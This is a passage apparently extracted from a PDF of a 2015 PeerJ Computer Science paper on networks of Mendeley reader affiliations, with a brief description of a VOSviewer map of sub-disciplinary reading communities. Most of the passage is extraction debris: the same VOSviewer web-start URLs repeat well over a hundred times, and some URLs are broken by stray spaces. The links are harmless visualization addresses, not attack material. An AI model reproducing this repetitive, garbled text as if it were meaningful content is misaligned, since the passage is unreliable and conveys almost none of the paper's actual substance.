http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig2_map.txt&network=http://www.leydesdorff.net/mendeley/fig2_net.txt&n_lines=10000 http://dx.doi.org/10.7717/peerj-cs.32 Figure 1 256 affiliations, mainly in the social sciences and the humanities (group 2). This fig- ure can be web-started at http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/ mendeley/fig1 map.txt&network=http://www.leydesdorff.net/mendeley/fig1 net.txt&n lines=10000. Figure 3 visualizes the entire network of sub-disciplinary affiliations. It shows that the core set is occupied by readers who characterize themselves as “miscellaneous” readers from different disciplines such as “biology miscellaneous”, “environmental science miscellaneous”, etc. The social sciences (“miscellaneous”) are one among these reading communities. The humanities, however, are placed more in the periphery. The algorithmically generated distinctions among the four groups (using Blondel et al., 2008) cannot be clearly distinguished using this projection, because the domains overlap when projected on a two-dimensional plane. The figure is therefore based on the mapping of VOSviewer in this case. This figure can be web-started from http://www.vosviewer.com/ vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig3 map.txt&network=http:/ /www.leydesdorff.net/mendeley/fig3 net.txt&n lines=1000. Haunschild et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.32 6/15 https://peerj.com/computer-science/ http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig1_map.txt&network=http://www.leydesdorff.net/mendeley/fig1_net.txt&n_lines=10000 